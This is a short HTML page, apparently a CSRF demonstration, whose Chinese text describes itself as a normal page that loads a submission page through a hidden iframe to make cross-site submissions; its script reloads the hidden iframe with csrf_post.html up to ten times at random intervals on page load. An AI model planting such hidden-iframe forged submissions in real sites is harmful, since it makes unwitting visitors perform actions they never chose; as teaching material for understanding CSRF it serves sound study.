<html>
<head>
    <meta charset="utf-8" />
</head>
<body>
    我是用户要浏览的正常数据页面，我通过隐藏的iFrame去加载提交页面，去进行跨站提交
    <iframe src="" id="iff" style="display: none;" frameborder="0"></iframe>

    <script src="../libs/jquery/jquery-3.2.1.min.js"></script>
    <script type="text/javascript">
        var parentParam = 496;
        var i = 1;
        var maxTry = 10;
        function batchPost() {
            parentParam ++;
            $('#iff').attr('src', 'csrf_post.html?i=' + i);
            if (i++ >= maxTry) return;
            setTimeout(batchPost, Math.random() * 5000); // 0-5秒随机继续执行
        }

        batchPost();
    </script>
</body>
</html>